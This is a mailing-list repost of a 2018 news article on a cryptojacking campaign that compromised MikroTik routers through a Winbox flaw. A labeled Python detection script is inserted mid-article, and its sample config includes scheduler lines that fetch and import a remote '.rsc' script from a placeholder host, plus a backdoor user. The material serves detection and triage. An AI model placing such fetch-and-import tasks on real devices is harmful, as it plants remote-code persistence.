[BreachExchange] Huge Cryptomining Attack on ISP-Grade Routers Spreads Globally

Inga Goddijn inga at riskbasedsecurity.com
Fri Aug 3 09:05:09 EDT 2018


https://threatpost.com/huge-cryptomining-attack-on-isp-grade-routers-spreads-globally/134667/

A massive hacking campaign has been uncovered, compromising tens of
thousands of MikroTik routers to embed Coinhive scripts in websites using a
known vulnerability.

So far, Censys.io has reported
<https://twitter.com/bad_packets/status/1024868429797322753> more than
170,000 active MikroTik devices infected with the CoinHive site-key used in
this campaign (the site-key is the same across infections, indicating a
single entity behind the attacks). The campaign is mainly targeting Brazil
– but infections are growing internationally, according to Trustwave’s
Secure Web Gateway (SWG) team, indicating much larger ambitions.

“This is a warning call and reminder to everyone who has a MikroTik device
to patch as soon as possible,” Trustwave researcher Simon Kenin wrote in a
posting
<https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/>
today. “This attack may currently be prevalent in Brazil, but during the
final stages of writing this blog, I also noticed other geo-locations being
affected as well, so I believe this attack is intended to be on a global
scale.”

MikroTik routers are used in large enterprises and by ISPs to serve web
pages to thousands or more users daily, meaning that each compromise
translates into a big payday for the threat actor.

“We’re … talking about potentially millions of daily pages for the
attacker,” Kenin wrote. “The attacker wisely thought that instead of
infecting small sites with few visitors, or finding sophisticated ways to
run malware on end-user computers, they would go straight to the source:
carrier-grade router devices.”

Kenin added that while cryptomining is the primary goal of this wave of
attacks, the script has persistence and the flexibility to change and add
new features, exacerbating the threat.

A Known Vulnerability

The attacks demonstrate the dangers of neglecting to patch. The campaign is
taking advantage of a known vulnerability in the routers, which was patched
by MikroTik <https://forum.mikrotik.com/viewtopic.php?f=21&t=133533> on
April 23rd. A tweet
<https://twitter.com/MalwareHunterBR/status/1023893755974352896> from
@MalwareHunterBR revealed the exploit being used, which targets Winbox and
allows the attacker to gain unauthenticated remote administrative access to
any vulnerable MikroTik router. A Shodan search shows at least 70,000
affected routers in Brazil alone, and tens of thousands more in other
geographies.

Whoever’s behind the campaign – so far, an unknown entity – also has some
know-how when it comes to this particular router, given that he or she
found a new attack vector for the vulnerability.

“Initial investigation indicates that instead of running a malicious
executable on the router itself, which is how the exploit was being used
when it was first discovered, the attacker used the device’s functionality
in order to inject the CoinHive script into every web page that a user
visited,” explained Kenin.

Further, the researcher uncovered that many of the compromised pages are
actually error pages of the webproxy, meaning that the attacker created a
custom error page with the CoinHive script in it.

“If a user receives an error page of any kind while web browsing, they will
get [a] custom error page which will mine CoinHive for the attacker,” Kenin
explained. “The backend Apache server is connected to the router as well,
and somewhere along the way there was an error and it was displayed to me,
miner included. What this means is that this also impacts users who are not
directly connected to the infected router’s network, but also users who
visit websites behind these infected routers. In other words, the attack
works in both directions.”

A Growing Campaign

The Trustwave research shows that the attacker has built mechanisms into
the attacks that offer future potential for the existing infections.

Meanwhile, among the commands that are executed when a router is infected
is the creation of scheduled tasks for updating if needed. For one, he or
she has scheduled a task which connects to another host and fetches a new
“error.html” file – likely in the event that the site-key was blocked and
had to be replaced with another.

The attacker also scheduled a task which downloads and executes a script
written for MikroTik routers named “u113.rsc”. A backdoor account named
“ftu” is created as well.

“When we checked, the script was just being used as a placeholder, but it’s
clearly a way for the attacker to send additional commands to all
compromised devices at their disposal,” Kenin explained, adding that he
noticed the script being updated a few times during his investigation.
These updates added more cleanup commands to leave a smaller footprint and
reduce the risk of being detected.
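As an added example (not code from the article, Threatpost or Trustwave), the following Python script scans a RouterOS `/export` configuration dump for the persistence indicators the article describes: scheduler entries that fetch a replacement proxy error page or an `.rsc` script from a remote host, a user account named `ftu`, and an enabled web proxy. The sample configuration is constructed, the host name in it is a placeholder, and the way the scheduled tasks are written (`/tool fetch` followed by `/import`) is an assumption about how such a task would look; treat the output as a triage aid for deciding which devices to inspect and patch, not as proof of compromise.

```python
import re

# Constructed sample of a RouterOS "/export" dump; not a real capture.
# Indicators mirror the article: a scheduler task that fetches a new
# "error.html", one that fetches and runs "u113.rsc", and a user "ftu".
# PLACEHOLDER.invalid stands in for the attacker host, which the article
# does not name. The trailing backslash on one line exercises RouterOS
# line wrapping.
SAMPLE_EXPORT = r"""
/system scheduler
add interval=1h name=update-error on-event="/tool fetch url=http://PLACEHOLDER.invalid/error.html mode=http dst-path=webproxy/error.html" policy=ftp,read,write,policy,test
add interval=1h name=upd113 on-event="/tool fetch url=http://PLACEHOLDER.invalid/u113.rsc \
    mode=http; /import u113.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon
add interval=1d name=nightly on-event="/log info nightly-housekeeping" start-time=03:00:00
/user
add name=admin group=full
add name=ftu group=full
/ip proxy
set enabled=yes port=8080
"""


def parse_export(text):
    """Return (section, entry) pairs from RouterOS export text.

    Section headers start with "/" (e.g. "/system scheduler"); entries are
    the "add"/"set" lines under them. Long lines are wrapped with a trailing
    backslash in real exports, so those are joined before parsing.
    """
    entries, section, buf = [], None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        line, buf = buf + line, ""
        if line.startswith("/"):
            section = line
        else:
            entries.append((section, line))
    return entries


def scan_export(text, known_users=("admin",)):
    """Return a list of (severity, reason, entry) findings for one export."""
    findings = []
    for section, entry in parse_export(text):
        if section == "/system scheduler" and "/tool fetch" in entry:
            # A scheduled remote fetch is unusual on its own; fetching a
            # proxy error page or a .rsc script (or importing one) is the
            # exact persistence mechanism reported in the campaign.
            urls = " ".join(re.findall(r"url=(\S+)", entry))
            if re.search(r"(error\.html|\.rsc)\b", urls) or "/import" in entry:
                findings.append(("high", "scheduler fetches/imports remote script or proxy error page", entry))
            else:
                findings.append(("medium", "scheduler performs remote fetch", entry))
        elif section == "/user" and entry.startswith("add"):
            m = re.search(r"name=(\S+)", entry)
            name = m.group(1) if m else ""
            if name == "ftu":
                findings.append(("high", "backdoor account name reported in campaign", entry))
            elif name not in known_users:
                findings.append(("low", "user account not in expected list", entry))
        elif section == "/ip proxy" and "enabled=yes" in entry:
            # The web proxy is the path used to inject the mining script;
            # worth confirming it is intentionally enabled.
            findings.append(("info", "web proxy enabled", entry))
    return findings


if __name__ == "__main__":
    for severity, reason, entry in scan_export(SAMPLE_EXPORT):
        print(f"[{severity:6}] {reason}\n         {entry}")
```

Run it against a real export (`/export file=config` on the router, then copy the file off) in place of the constructed sample; the `known_users` tuple should be set to the accounts you actually provisioned.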

“MikroTik users need to ensure their RouterOS is up-to-date with the latest
security patches,” said Troy Mursch
<https://twitter.com/bad_packets/status/1024868429797322753>, security
researcher at Bad Packets Report, via email. “Otherwise, as we see in this
case, they can be compromised to inject cryptojacking malware. As the
Censys and Shodan search results reveal, it’s been easy for miscreants to
compromise them on a large scale.”